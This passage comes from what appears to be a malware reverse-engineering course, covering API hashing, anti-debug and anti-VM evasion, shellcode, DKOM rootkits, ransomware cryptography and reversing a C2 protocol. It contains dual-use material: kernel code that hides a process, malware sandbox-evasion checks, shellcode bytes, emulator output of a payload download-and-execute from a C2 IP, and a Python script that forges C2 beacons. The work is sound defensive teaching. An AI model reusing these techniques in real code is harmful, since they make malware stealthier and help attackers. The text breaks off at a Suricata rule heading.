In Ghidra: Search → For Scalars → size=4, find DWORD constants Filter to the hash resolution function (look for it near the PEB walk) The function compares a DWORD register against hardcoded constants — those are hashes Ghidra decompiler — hash comparison in resolve_api(): if (ror13_hash(export_name) == 0x72E2CAE7) { fn_table[0] = export_addr; // CreateRemoteThread } if (ror13_hash(export_name) == 0xE553A458) { fn_table[1] = export_addr; // VirtualAllocEx } After running the resolver script, annotate Ghidra: Rename fn_table[0] call sites → CreateRemoteThread Add comment to 0x72E2CAE7 constant → "ROR13('CreateRemoteThread')"

Key Takeaways — Chapter 6

API hashing leaves no API name strings in the binary — the only evidence is the hash constants and the PEB walk routine; identifying the PEB walk is the entry point to finding which APIs the malware uses
ROR13 is the most common API hashing scheme (used by Metasploit, Cobalt Strike shellcode, and many custom implants) — a precomputed lookup table of all Windows API names resolves all hashes in seconds
Once hashes are resolved, annotate Ghidra immediately with the correct API names — the downstream decompilation of every function that calls the resolved function table becomes readable
Different hashing schemes (djb2, FNV, custom) require identifying the hash function from its disassembly — the rotate-and-accumulate pattern in the inner loop is the giveaway; adjust your Python implementation to match
Community tools like HashDB (OALabs) maintain databases of known API hashes for common malware families — check HashDB before writing a custom resolver

Part III · Chapters 7–8

Anti-Analysis and Evasion

Understanding and defeating the techniques malware uses to detect debuggers, virtual machines, and sandbox environments — and how to configure your analysis environment to see past them

Chapter 07 · ~15 min · Anti-Analysis & Evasion Evasion RE

Anti-Debugging Techniques

PEB flag detection, API-based checks, timing attacks, exception-based detection, heap flags, and defeating each technique with ScyllaHide and runtime patching

Anti-debugging is the set of techniques malware uses to detect that it is running under a debugger and alter its behaviour accordingly — typically by exiting, sleeping, or executing decoy code. Every technique described in this chapter has a countermeasure. The analyst's goal is not to eliminate anti-debugging from the sample but to neutralise it efficiently so analysis can proceed.

PEB-Based Detection

The Process Environment Block (PEB) contains two fields that Windows sets to indicate a debugger is attached. These are the most commonly used and easiest to detect checks.

PEB Flag ChecksBeingDebugged and NtGlobalFlag — what the assembly looks like

PEB.BeingDebugged (offset 0x02 in 32-bit, 0x02 in 64-bit): 00401080 64 A1 30 00 mov eax, fs:[30h] ; PEB address (32-bit) 00401084 0F B6 40 02 movzx eax, byte [eax+2] ; PEB.BeingDebugged (0=no, 1=debugger) 00401088 85 C0 test eax, eax 0040108A 75 xx jnz exit_or_decoy ; ← patch this JNZ to JMP (always skip) or NOP Defeat: patch in x64dbg: Right-click JNZ → Assemble → JMP short (changes to always-jump-over the check) Or: ScyllaHide → NtSetInformationThread + PEB patching → automated NtGlobalFlag (PEB offset 0x68/0xBC) — set to 0x70 when debugged: 004010C0 64 A1 30 00 mov eax, fs:[30h] 004010C4 8B 40 68 mov eax, [eax+68h] ; PEB.NtGlobalFlag 004010C7 83 E0 70 and eax, 70h ; mask for debug flags (FLG_HEAP_ENABLE_*) 004010CA 74 xx jz continue_execution ; 0x70 → nonzero → takes exit path Defeat: patch EAX to 0 after the AND, before the JZ: Break at 0x004010CA → modify EAX = 0 in registers pane → F9 to continue

API-Based Detection

API Anti-Debug ChecksIsDebuggerPresent, CheckRemoteDebuggerPresent, NtQueryInformationProcess

IsDebuggerPresent — simplest, most common: 00401200 FF 15 call ds:IsDebuggerPresent 00401206 85 C0 test eax, eax 00401208 75 xx jnz debugger_found Defeat: ScyllaHide intercepts and returns 0; or NOP the call + zero EAX manually NtQueryInformationProcess (ProcessDebugPort) — harder to defeat: 00401280 6A 00 push 0 ; ReturnLength 00401282 6A 04 push 4 ; ReturnLength buffer size 00401284 68 xx xx xx xx push offset debug_port ; ProcessInformation buffer 00401289 6A 07 push 7 ; ProcessInformationClass=7 (ProcessDebugPort) 0040128B 6A FF push -1 ; hProcess = current process 0040128D FF 15 call ds:NtQueryInformationProcess ; debug_port will be nonzero if debugger is attached Defeat: ScyllaHide; or set a BP at the buffer address write → zero the result

Timing-Based Detection

Timing AttacksRDTSC delta and GetTickCount — detecting debugger-induced slowdown

RDTSC delta check — measures CPU clock cycles between two reads: 00401300 0F 31 rdtsc ; read TSC → EDX:EAX (t1) 00401302 89 45 F8 mov [ebp-8], eax ; save t1 ... (some operations between the two reads) ... 00401320 0F 31 rdtsc ; read TSC → EDX:EAX (t2) 00401322 2B 45 F8 sub eax, [ebp-8] ; delta = t2 - t1 00401325 3D 00 40 00 00 cmp eax, 0x4000 ; threshold: 16384 cycles 0040132A 77 xx ja debugger_found ; if delta too large → debugger Defeat options: 1. ScyllaHide: RDTSC emulation → returns consistent small values 2. x64dbg plugin: rdtsc_fuzzer → randomises RDTSC return values 3. Manual: BP at 0x0040132A → modify EAX to 0 → F9 to continue

ScyllaHide — Automated Anti-Debug Bypass

ScyllaHide is an x64dbg plugin that automatically handles the most common anti-debugging techniques. It intercepts relevant API calls, patches PEB fields, and emulates timing functions to present a clean environment to the malware. For most commodity malware, enabling ScyllaHide before analysis makes anti-debug bypassing essentially automatic.

ScyllaHideRecommended configuration for commodity malware analysis

x64dbg → Plugins → ScyllaHide → Options: ✓ PEB BeingDebugged patch to 0 ✓ PEB NtGlobalFlag patch to 0 ✓ PEB HeapFlags patch heap flags ✓ NtSetInformationThread hide from debugger ✓ IsDebuggerPresent hook → return 0 ✓ CheckRemoteDebuggerPresent hook → return FALSE ✓ NtQueryInformationProcess hook ProcessDebugPort ✓ GetTickCount / RDTSC emulate consistent values ✗ OutputDebugString trick leave OFF (rarely used, causes instability) For sophisticated samples (Themida, VMProtect): ScyllaHide may be insufficient. Supplement with: manual breakpoints at detection functions, x64dbg conditional BPs

Key Takeaways — Chapter 7

PEB.BeingDebugged and NtGlobalFlag are the most common checks — ScyllaHide patches both automatically; for manual bypass, patch the conditional jump after the check or zero the result register before the branch
NtQueryInformationProcess with ProcessDebugPort (class 7) is harder to defeat than IsDebuggerPresent because it queries the kernel directly — ScyllaHide hooks it at the syscall level
RDTSC timing checks fire because execution is much slower under a debugger — ScyllaHide's RDTSC emulation eliminates this; manual bypass requires modifying the delta register to a value below the threshold
Hardware breakpoints don't insert INT3 bytes and are therefore invisible to byte-scanning anti-debug checks — prefer hardware BPs over software BPs when analysing protected samples
Exception-based detection works by generating an exception and checking whether a debugger caught it before the program's exception handler — ScyllaHide's exception handling hooks neutralise this class of check

Chapter 08 · ~14 min · Anti-Analysis & Evasion Evasion RE

Anti-VM and Anti-Sandbox Techniques

CPUID hypervisor detection, VM artefact enumeration, timing differentials, user interaction and locale checks, and defeating each at the analysis environment level

Anti-VM and anti-sandbox techniques are structurally similar to anti-debugging: the malware checks for indicators of a controlled analysis environment and changes behaviour if it detects one. The key difference is scale — anti-debugging is defeated once per debugging session; anti-VM must be defeated at the analysis environment configuration level, before samples are even run, because reconfiguring a VM per-sample is impractical at volume.

CPUID-Based Hypervisor Detection

CPUID Hypervisor BitChecking the hypervisor present bit in CPUID leaf 1

CPUID leaf 0x01, bit 31 of ECX = "Hypervisor Present" bit: 00401400 B8 01 00 00 00 mov eax, 1 ; CPUID leaf 1 00401405 0F A2 cpuid ; execute CPUID instruction 00401407 F7 C1 00 00 00 80 test ecx, 80000000h ; check bit 31 of ECX 0040140D 75 xx jnz vm_detected ; nonzero = running in a VM Reading hypervisor vendor string (CPUID leaf 0x40000000): 00401420 B8 00 00 00 40 mov eax, 40000000h ; hypervisor leaf 00401425 0F A2 cpuid ; EBX:ECX:EDX = vendor string ; VMware: "VMwareVMware", VirtualBox: "VBoxVBoxVBox" Defeat: in VMware Workstation → VM Settings → Processors → Disable "Virtualize CPU performance counters" Set "cpuid.hypervisorVendorId" to a random string in .vmx file

VM Artefact Enumeration

VM Artefact ChecksRegistry keys, process names, MAC address OUI, disk size checks

Registry-based VM detection (common targets): HKLM\SOFTWARE\VMware, Inc.\VMware Tools HKLM\SOFTWARE\Oracle\VirtualBox Guest Additions HKLM\HARDWARE\ACPI\DSDT\VBOX__ HKLM\SYSTEM\ControlSet001\Services\VBoxGuest Defeat: rename/delete these registry keys in analysis VM (automated via a cleanup script) Process name enumeration (malware lists running processes): vmtoolsd.exe, vmwaretray.exe (VMware Tools) VBoxService.exe, VBoxTray.exe (VirtualBox) vmsrvc.exe, vmusrvc.exe (Virtual PC) wireshark.exe, procmon.exe, ida.exe, x64dbg.exe Defeat: rename analysis tools; stop/uninstall VMware Tools or rename its processes MAC address OUI check: 00:0C:29 = VMware 08:00:27 = VirtualBox 00:15:5D = Hyper-V 00:50:56 = VMware ESXi Defeat: change VM NIC MAC address to a real vendor OUI (e.g. Intel: 00:1B:21) Disk size check (VMs often have small disks): if (disk_size < 100GB) exit(); // real machines rarely have <100GB drives Defeat: provision analysis VM with 120GB+ virtual disk Screen resolution check: if (GetSystemMetrics(SM_CXSCREEN) < 1024) exit(); Defeat: set VM resolution to 1920×1080 before taking the clean baseline snapshot

User Interaction and Environment Checks

User and Environment ChecksMouse movement, recent files, username, and locale-based evasion

Mouse movement check (no user interaction in sandbox): POINT pt1, pt2; GetCursorPos(&pt1); Sleep(5000); // wait 5 seconds GetCursorPos(&pt2); if (pt1.x == pt2.x && pt1.y == pt2.y) exit(); // no movement = sandbox Defeat: x64dbg → modify pt2.x/pt2.y to differ from pt1; or use a mouse-movement script Recent files / MRU check (real users have recently opened documents): if (count(HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs) < 10) exit(); Defeat: populate analysis VM with fake recent document history before baseline snapshot Username/hostname blocklist: Blocklisted usernames: SANDBOX, MALTEST, ANALYST, JOHN, virus, malware Blocklisted hostnames: DESKTOP-FLAREVM, SANDBOX-WIN10, CUCKOO Defeat: use a realistic username/hostname in the analysis VM (e.g. JOHN-PC / john.smith) CIS locale exclusion (crimeware avoiding Eastern Europe): if (GetSystemDefaultLCID() in {RU=0x419, UA=0x422, BY=0x423, KZ=0x43F}) exit(); Defeat: set VM locale to en-US (0x0409) if not already set

Reversing the Anti-VM Code Itself

When a sophisticated sample evades your environment despite these countermeasures, the solution is to reverse engineer the anti-VM routine itself and understand exactly what it checks. Set breakpoints before the check, single-step through it, observe what API it calls or what registry key it reads, and patch the comparison. The analytical approach always wins — every check is a comparison that can be patched.

Key Takeaways — Chapter 8

Configuring the analysis VM baseline correctly eliminates most anti-VM checks before they become a per-sample problem — realistic hostname, username, MAC address, disk size, screen resolution, and populated document history should all be set before taking the clean baseline snapshot
CPUID leaf 0x40000000 returns the hypervisor vendor string — VMware and VirtualBox both have characteristic strings that malware compares against; this string can be overridden in VMware .vmx configuration files
The CPUID hypervisor present bit (ECX bit 31 from leaf 1) is the fastest VM detection check and the hardest to defeat without hardware virtualisation configuration changes — some analysts use bare-metal machines for samples that heavily gate on this
Locale-based exclusions (CIS country codes) are common in crimeware — an analysis VM with en-US locale is transparent to this check without any modification
Every anti-VM check reduces to a comparison that can be patched in x64dbg — if the environment-level countermeasures don't work, reverse the check and patch the branch; analysis always proceeds

Part IV · Chapters 9–12

Advanced Topics

Shellcode analysis, kernel malware and rootkits, full ransomware reverse engineering, and C2 protocol reconstruction — the specialist skills that complete the reverse engineering toolkit

Chapter 09 · ~15 min · Advanced Topics Specialist RE

Shellcode Analysis

Position-independent code, the GetPC technique, PEB walk to find kernel32, running shellcode safely with scdbg and Speakeasy, and analysing shellcode in Ghidra

Shellcode is position-independent executable code — a raw byte sequence that can run at any memory address without the Windows loader's assistance. It contains no import table, no PE header, no relocation table. It finds everything it needs at runtime: its own location in memory, the base address of kernel32, the addresses of the API functions it requires. Understanding how it does this is what makes shellcode analysis tractable.

Why Shellcode Has No Imports

A PE file delegates import resolution to the Windows loader. Shellcode has no loader — it must bootstrap itself. The techniques covered in this chapter — GetPC and the PEB walk — are the universal shellcode bootstrap mechanism. Every piece of shellcode you encounter will use some variant of these, making them the first patterns to look for in any shellcode analysis.

The GetPC Technique

Position-independent code cannot use hardcoded addresses, because it doesn't know where it will be loaded in memory. To reference its own data (embedded strings, encrypted payloads, function tables), shellcode first needs to determine its own current address. The classic technique is the CALL/POP pattern.

GetPC — CALL/POP PatternHow shellcode discovers its own address in memory

Classic x86 GetPC — CALL pushes the next instruction's address onto the stack: 00000000 E8 00 00 00 00 call $+5 ; push address of next instruction (0x00000005) 00000005 58 pop eax ; eax = 0x00000005 (shellcode base + 5) 00000006 83 E8 05 sub eax, 5 ; subtract 5 → eax = shellcode base address x64 variant using RIP-relative addressing (simpler, no CALL/POP needed): 0000000000000000 48 8D 05 F9 FF FF FF lea rax, [rip-7] ; rax = address of this instruction After GetPC, shellcode accesses its embedded data by offset from the base: 00000009 8D 48 50 lea ecx, [eax+50h] ; ecx = shellcode_base + 0x50 ; offset 0x50 = beginning of the embedded C2 URL string

The PEB Walk — Finding kernel32 from Scratch

PEB WalkHow shellcode finds kernel32 base address without calling GetModuleHandle

Windows maintains a linked list of loaded modules in the PEB. The 3rd entry in InMemoryOrderModuleList is always kernel32.dll: 0000000A 64 A1 30 00 mov eax, fs:[30h] ; EAX = PEB (fs:[0x30]) 0000000E 8B 40 0C mov eax, [eax+0Ch] ; EAX = PEB_LDR_DATA 00000011 8B 70 14 mov esi, [eax+14h] ; ESI = InMemoryOrderModuleList.Flink 00000014 AD lodsd ; EAX = next entry (ntdll) 00000015 AD lodsd ; EAX = next entry (kernel32) 00000016 8B 40 10 mov eax, [eax+10h] ; EAX = kernel32.dll DllBase Now EAX = kernel32 base. Shellcode walks its export table to resolve APIs by name or hash. This is always followed by the API hashing routine from Chapter 6. The complete bootstrap sequence in every piece of shellcode: 1. GetPC → discover own base address 2. PEB walk → find kernel32 base 3. API hash resolution → resolve needed APIs from kernel32 / ntdll 4. Begin actual malicious activity (download, inject, execute)

Shellcode in Raw Bytes — What It Looks Like on Disk

Shellcode arrives as a raw blob — no headers, no section table, just executable bytes starting at offset zero. Recognising the CALL/POP GetPC pattern and the PEB walk from the raw hex is the first step before loading it into Ghidra or scdbg.

Raw Shellcode — CALL/POP GetPC + PEB Walk in Hex

Offset 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F Pattern 0x000000 E8 00 00 00 00 58 83 E8 05 89 45 F8 90 90 90 90 ← CALL $+5 / POP EAX = GetPC 0x000010 64 A1 30 00 00 00 8B 40 0C 8B 70 14 AD AD 8B 40 ← PEB walk begins: fs:[0x30] 0x000020 10 89 45 EC 8B 75 EC 8B 76 3C 03 F6 8B 76 78 03 ← kernel32 DllBase → export dir 0x000030 F6 8B 5E 20 03 DE 33 C9 41 8B 3C 8B 03 FE 68 4A walking export name table 0x000040 E7 E2 72 39 07 75 08 8B 56 24 03 D6 0F B7 14 4A ← hash compare: 0x72E2CA? = ROR13 No MZ header. No section table. Bytes at offset 0 are the first instruction.

Running Shellcode Safely for Analysis

scdbg / SpeakeasySafely executing shellcode for behavioural analysis without a running Windows instance

scdbg — shellcode emulator (Linux/Windows, no VM required): $ scdbg /f shellcode.bin /verbose Loaded 512 bytes from shellcode.bin Initializing Emulation... Starting Emulation... 4011b0 LoadLibraryA(wininet) 4011c3 InternetOpenA(Mozilla/5.0 ...) 4011d2 InternetConnectA(185.220.101.45, 443, ...) 4011e5 HttpOpenRequestA(GET, /stager/payload.bin, ...) 4011f8 HttpSendRequestA(...) 401210 VirtualAlloc(0, 0x8000, MEM_COMMIT, PAGE_EXECUTE_READWRITE) 401230 InternetReadFile → writes 0x6200 bytes to allocated buffer 401250 CreateThread(0, 0, allocated_buffer, ...) ← executes downloaded payload Completed. IOCs extracted: C2 = 185.220.101.45:443, URI = /stager/payload.bin Speakeasy (Python, by Mandiant) — more accurate emulation: $ python3 speakeasy.py -t shellcode.bin -r -a x86 Output: speakeasy_report.json (full API call log with arguments)

Analysing Shellcode in Ghidra

Ghidra — Shellcode ProjectCreating a raw binary project and defining the entry point manually

Shellcode has no PE header — Ghidra can't auto-detect the format. Import as raw binary: File → Import File → shellcode.bin Format: Raw Binary Language: x86:LE:32:default (or x86:LE:64:default for 64-bit shellcode) Image Base: 0x00000000 After import, Ghidra shows raw bytes — no functions defined. Manually define entry point: Navigate to offset 0x00000000 Press D (Disassemble) → Ghidra disassembles from this point Press F (Define Function) → creates function FUN_00000000 Rename → shellcode_entry Follow the PEB walk (Chapter 6 pattern) to the API resolution loop Use the API hash resolver script to annotate resolved function names After annotating API calls: decompiler produces readable C-like pseudocode

Key Takeaways — Chapter 9

The CALL/POP GetPC pattern is the first thing to look for in any shellcode — it appears in the first dozen bytes and establishes the base address that all subsequent data references are relative to
The PEB walk is universal in x86 shellcode — fs:[0x30] → PEB → LDR → InMemoryOrderModuleList → third entry = kernel32; recognise this 6-instruction sequence on sight
scdbg provides fast behavioural analysis of shellcode without executing it on real hardware — it emulates API calls and reports all network connections, file operations, and execution transfers in seconds
Ghidra can analyse shellcode as a raw binary — the key difference from PE analysis is manually defining the entry point at offset 0 and manually annotating API calls resolved via the PEB walk
After identifying the PEB walk and API hashing scheme, apply the Chapter 6 hash resolver script to annotate all API call sites — the shellcode becomes fully readable in Ghidra's decompiler

Chapter 10 · ~16 min · Advanced Topics Kernel RE

Rootkit and Kernel Malware Analysis

User-mode vs kernel-mode rootkits, DKOM process and file hiding, driver loading and DriverEntry, WinDbg kernel debugging setup, and Volatility kernel analysis plugins

Rootkits operate at or below the level of the operating system's own visibility mechanisms. A user-mode rootkit can hide from the OS by hooking the functions the OS uses to list processes and files. A kernel-mode rootkit modifies the kernel data structures themselves. Understanding both requires a mental model of how Windows manages processes and handles system calls.

User-Mode vs Kernel-Mode Rootkits

Type	Mechanism	Persistence	Detection Approach
User-mode hook	Modifies function pointers in user-space DLLs (ntdll.dll, kernel32.dll) to intercept API calls	Until process restart; injects into system processes for longevity	Compare in-memory function bytes to on-disk DLL bytes — hooks show as modified bytes
DKOM	Directly modifies kernel objects (process list, file records) — removes entries rather than hiding them from queries	Until reboot; survives even kernel queries if the object is removed from all lists	Cross-view analysis — compare results from multiple enumeration methods; Volatility pstree vs pslist discrepancy
Kernel driver	Loads a malicious .sys driver that runs in Ring 0 with full kernel privileges	Via service key or registry Run entry pointing to .sys file	Enumerate loaded drivers; check driver signing; Volatility modules + driverscan
SSDT hook	Overwrites entries in the System Service Descriptor Table to redirect syscalls to malicious handlers	In memory; requires kernel driver to write SSDT	Volatility ssdt plugin — compares SSDT entries to expected ntoskrnl values

DKOM — Direct Kernel Object Manipulation

DKOM — EPROCESS List UnlinkingHow a rootkit removes a process from the kernel's active process list

Windows maintains a doubly-linked list of all EPROCESS structures. The ActiveProcessLinks field at EPROCESS+0x448 (Win10 x64) links all processes. Removing a process from this list makes it invisible to Process Explorer and Task Manager: // Kernel driver code to unlink a process from the EPROCESS list PEPROCESS target = find_process_by_pid(target_pid); LIST_ENTRY* entry = (LIST_ENTRY*)((ULONG_PTR)target + ACTIVEPROCESSLINKS_OFFSET); // Standard doubly-linked list removal: entry->Blink->Flink = entry->Flink; // previous node's Flink skips this entry entry->Flink->Blink = entry->Blink; // next node's Blink skips this entry // Process is now invisible to any API that walks ActiveProcessLinks // But it still runs! The scheduler uses a different list. Detection: Volatility uses multiple enumeration strategies: pslist → walks ActiveProcessLinks (misses DKOM-hidden processes) psscan → scans raw memory for EPROCESS pool tags (finds DKOM-hidden processes) Discrepancy between pslist and psscan = DKOM rootkit hiding a process

Kernel Driver Analysis in Ghidra

Ghidra — Kernel Driver (.sys) AnalysisDriverEntry, IRP dispatch table, and SSDT hook detection

Import the .sys file into Ghidra — it's a PE, analysis proceeds normally Entry point is DriverEntry (exported symbol or at PE entry point) DriverEntry signature: NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) Key things to look for in DriverEntry: DriverObject->MajorFunction[IRP_MJ_CREATE] = handler_fn; // file open handler DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = ioctl_fn; // control interface KeServiceDescriptorTable modification → SSDT hook PsSetLoadImageNotifyRoutine / PsSetCreateProcessNotifyRoutine → process monitoring Direct EPROCESS / ETHREAD manipulation → DKOM Volatility kernel analysis plugins: $ vol -f memory.raw windows.modules lists all loaded kernel modules — look for unsigned or suspicious .sys files $ vol -f memory.raw windows.driverscan scans memory for DRIVER_OBJECT pool tags — finds hidden drivers not in modules list $ vol -f memory.raw windows.ssdt shows SSDT entries — hooked entries point outside ntoskrnl.exe address range

Key Takeaways — Chapter 10

DKOM hides processes by unlinking their EPROCESS entry from ActiveProcessLinks — they remain invisible to pslist but visible to psscan (pool tag scanning), which is why always running both is essential
DriverEntry is the kernel driver entry point — the IRP dispatch table assignments it makes reveal the driver's capability: a driver that sets up an IOCTL handler communicates with user-land; one that modifies SSDT entries hooks system calls
SSDT hooks redirect syscalls to the rootkit's handlers — Volatility's ssdt plugin identifies hooks by finding SSDT entries pointing outside ntoskrnl.exe's address range
A kernel driver requires either a valid code signing certificate (since Windows Vista 64-bit with Secure Boot) or a technique to bypass driver signature enforcement — unsigned drivers are an immediate red flag in memory forensics
Cross-view analysis — comparing results from two enumeration methods — is the foundational detection technique for rootkits; any discrepancy between two enumerations of the same resource indicates hiding behaviour

Chapter 11 · ~16 min · Advanced Topics Full RE Case Study

Ransomware Reverse Engineering

Key generation and the asymmetric wrapping scheme, reversing the encryption loop to identify the algorithm, file enumeration logic, weak RNG exploitation for key recovery, and what makes ransomware decryptable

Book 1 showed what ransomware looks like from the outside — the ProcMon events, the shadow copy deletion, the ransom note write. This chapter reverses a ransomware sample from the inside — reading the key generation code, identifying the encryption algorithm from its implementation, and understanding what separates recoverable ransomware (weak RNG, escrow key visible in memory, protocol vulnerability) from truly unrecoverable encryption.

The Standard Ransomware Cryptographic Architecture

Professional ransomware uses a hybrid encryption scheme: fast symmetric encryption (AES) for file content, and asymmetric encryption (RSA or elliptic curve) to protect the symmetric keys. Recovering files requires the attacker's private key, which never touches the victim's machine.

Ransomware Key ArchitectureThe hybrid encryption scheme in Ghidra decompiler pseudocode

Ghidra decompiler — key generation and per-file encryption: void encrypt_all_files() { // Step 1: generate a random session key byte session_aes_key[32]; CryptGenRandom(hProv, 32, session_aes_key); // 256-bit AES key // Step 2: encrypt session key with attacker's embedded RSA public key byte encrypted_session_key[256]; CryptEncrypt(hRsaKey, 0, TRUE, 0, session_aes_key, &key_len, 256); // RSA-encrypted with ATTACKER pubkey // Step 3: send encrypted session key to C2 (attacker can recover it with privkey) send_to_c2(victim_id, encrypted_session_key, 256); // Step 4: enumerate and encrypt every file enumerate_and_encrypt("C:\\Users\\", session_aes_key); // Step 5: zero the plaintext session key from memory SecureZeroMemory(session_aes_key, 32); } // ↑ If send_to_c2 fails (no internet), encrypted_session_key is written to ransom note // ↑ Victim MUST contact attacker — attacker decrypts session key, sends AES key back

Identifying the Encryption Algorithm from Code

When a sample uses the Windows CryptoAPI, the algorithm is identified by a constant passed to CryptCreateHash or CryptImportKey. When it implements encryption from scratch, you identify the algorithm by its mathematical constants.

AES S-Box DetectionIdentifying AES from its key schedule constant table in Ghidra

The AES S-Box is a fixed 256-byte lookup table. If this table appears in the binary, the sample implements AES. Searching in Ghidra for the AES S-Box first bytes (0x63, 0x7C, 0x77, 0x7B): Search → For Bytes → 63 7C 77 7B 28 ... (first 8 bytes of AES S-Box) Found at 0x00407A00 — this is the AES S-Box constant table Cross-reference this address → reaches the AES key schedule and encryption functions Rename: FUN_00401800 → aes_encrypt_block Algorithm identification by constants (common in custom implementations): AES: S-Box starts: 0x63, 0x7C, 0x77, 0x7B, 0xF2, 0x6B, 0x6F, 0xC5 ChaCha20: constant "expand 32-byte k" (0x61707865 in little-endian) Salsa20: same constant as ChaCha20 RC4: 256-byte KSA table initialised 0,1,2,...,255 then shuffled with key CryptoAPI ALG_ID constants (CALG_* values passed to CryptCreateHash): 0x00006610 = CALG_AES_256 0x00006603 = CALG_AES_128 0x0000A400 = CALG_RSA_KEYX 0x00008004 = CALG_SHA_256

What Makes Ransomware Decryptable — The Weak RNG Case

Weak RNG — Key RecoveryRansomware that seeds its RNG from the system time is recoverable

Ghidra decompiler — weak key generation (actual pattern from early ransomware families): void generate_key_WEAK(byte* key_out) { SYSTEMTIME st; GetLocalTime(&st); // ← seed is the current time srand(st.wMilliseconds + st.wSecond * 1000); for (int i = 0; i < 32; i++) { key_out[i] = (byte)rand(); // ← uses weak PRNG, not CryptGenRandom } } // If you know approximately WHEN the file was encrypted (from filesystem metadata), // you can brute-force the seed space (seconds × milliseconds = ~60,000 values per minute) // and try each potential key against a known-plaintext encrypted file → key recovery Strong key generation (using CryptGenRandom — not recoverable without attacker privkey): CryptGenRandom(hProv, 32, key_out); // 2^256 keyspace — brute force impossible

Key Takeaways — Chapter 11

The standard ransomware architecture uses AES for file encryption and RSA to protect the AES key — recovery requires the attacker's RSA private key unless a vulnerability exists in the key generation
Ransomware using rand() or time-based seeds instead of CryptGenRandom is potentially recoverable — the seed space is brute-forceable if the infection timestamp is known
Identifying the encryption algorithm by its mathematical constants (AES S-Box, ChaCha20 "expand 32-byte k") is faster than tracing the full key schedule — search for known constant byte sequences in Ghidra
If the C2 connection fails during key exchange, many ransomware families write the encrypted session key to the ransom note or a local file — recovery may be possible if you intercept the C2 traffic or find this file before it is deleted
The encryption loop structure (file enumeration → per-file AES key → encrypt file → rename with extension) is consistent across most ransomware families; identifying it in Ghidra proceeds rapidly once you recognise the patterns from Chapter 1's loop recognition

Chapter 12 · ~16 min · Advanced Topics Full RE Capstone

C2 Protocol Reverse Engineering and Detection

Finding and reversing the communication function, the command parsing loop, response encoding, emulating the protocol in Python, writing Suricata rules, and the complete RE workflow end-to-end

Every implant communicates with its operator via a C2 protocol. Understanding that protocol at the code level — not just observing its traffic from the outside — is what makes it possible to write detection rules that survive C2 infrastructure rotation, build decoders that can parse encrypted command streams, and understand the full command set the operator has available. This final chapter walks the complete reverse engineering of a C2 communication function.

Finding the C2 Communication Function

Ghidra — Locating the C2 FunctionWorking backward from network API imports to the communication function

Entry point: the import table shows InternetOpenA and HttpSendRequestA In Ghidra: Symbol Tree → Imports → WININET.DLL → HttpSendRequestA Right-click HttpSendRequestA → References → Find References → shows 2 call sites: 0x00401C20, 0x00401D80 Navigate to 0x00401C20 — this is likely in the main beacon function Rename containing function → beacon_send Navigate to beacon_send's caller: Right-click beacon_send → References → finds it called from FUN_00401A00 FUN_00401A00 sets up the headers, builds the POST body, calls beacon_send Rename: FUN_00401A00 → c2_checkin Navigate to c2_checkin's caller: Called in a loop with Sleep(60000) → this is the beacon loop Rename containing function → beacon_loop

Reversing the Command Parsing Loop

Ghidra Decompiler — parse_c2_response() — after annotation

void parse_c2_response(byte* response, DWORD resp_len) { // Response format: [4-byte magic][1-byte cmd_id][4-byte data_len][data...] if (*((DWORD*)response) != 0xDEADBEEF) { // magic check return; } byte cmd_id = response[4]; // command byte DWORD data_len = *((DWORD*)&response[5]); // data length (little-endian) byte* data = &response[9]; // data payload switch (cmd_id) { case 0x01: cmd_shell_execute(data, data_len); break; // execute shell command case 0x02: cmd_file_upload(data, data_len); break; // upload file to C2 case 0x03: cmd_file_download(data, data_len); break; // download file from C2 case 0x04: cmd_screenshot(); break; // capture screenshot case 0x05: cmd_keylog_start(); break; // start keylogger case 0xFF: cmd_uninstall(); break; // self-delete } }

Extracting the Session Key and Emulating the Protocol

Session Key ExtractionFinding the AES session key used to encrypt C2 traffic

The C2 traffic is AES-encrypted. The key is hardcoded in the binary. In Ghidra, the beacon_send function shows: aes_encrypt(payload, payload_len, DAT_00408040); // key = DAT_00408040 Navigate to 0x00408040 in Ghidra — 32 bytes of data: 0x00408040 3A 7F B2 C1 44 E9 82 05 F6 3D A1 7C 08 2B E4 9D 0x00408050 17 6A F5 0C 9B 48 D3 2E 6F A2 8C 51 B3 04 CE 7A ← This is the 32-byte AES-256 key hardcoded in the binary Python: emulate the C2 check-in with the extracted key: import socket, struct from Crypto.Cipher import AES AES_KEY = bytes.fromhex("3a7fb2c144e98205f63da17c082be49d176af50c9b48d32e6fa28c51b304ce7a") MAGIC = 0xDEADBEEF def build_checkin(victim_id: str) -> bytes: payload = victim_id.encode().ljust(16, b'\x00') cipher = AES.new(AES_KEY, AES.MODE_CBC, iv=b'\x00'*16) enc = cipher.encrypt(payload) return struct.pack('<IBI', MAGIC, 0x00, len(enc)) + enc # magic + cmd=0x00 + len + data pkt = build_checkin("DESKTOP-VICTIM1") print("Emulated beacon:", pkt.hex()) # Can now send to C2 server to test response — confirms protocol understanding

Documenting the Protocol Structure

Protocol DocumentationStructured packet format derived from reverse engineering parse_c2_response

C2 Packet Format (from reversing parse_c2_response): ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ Offset Size Field Value / Notes 0x00 4 magic 0xDEADBEEF (LE) — always present, identifies protocol 0x04 1 cmd_id 0x00=noop, 0x01=shell, 0x02=upload, 0x03=download 0x04=screenshot, 0x05=keylog_start, 0xFF=uninstall 0x05 4 data_len Length of data payload in bytes (LE uint32) 0x09 N data AES-256-CBC encrypted payload (key: hardcoded at 0x408040) Check-in packet (client → server, cmd_id=0x00): data = AES_encrypt(victim_id[16] + os_version[32] + username[32] + hostname[16]) Shell command response (server → client, cmd_id=0x01): data = AES_encrypt(command_string, null-terminated) Total header overhead: 9 bytes. Min packet size: 9 bytes (empty payload). Beacon interval: 60s ± 5s jitter (observed in Sleep() call in beacon_loop) C2 transport: HTTPS to hardcoded IP 185.220.101.45:443 (no domain used)

Writing a Suricata Rule from the Reversed Protocol

Suricata Rule — detecting the C2 magic bytes at TCP payload offset 0

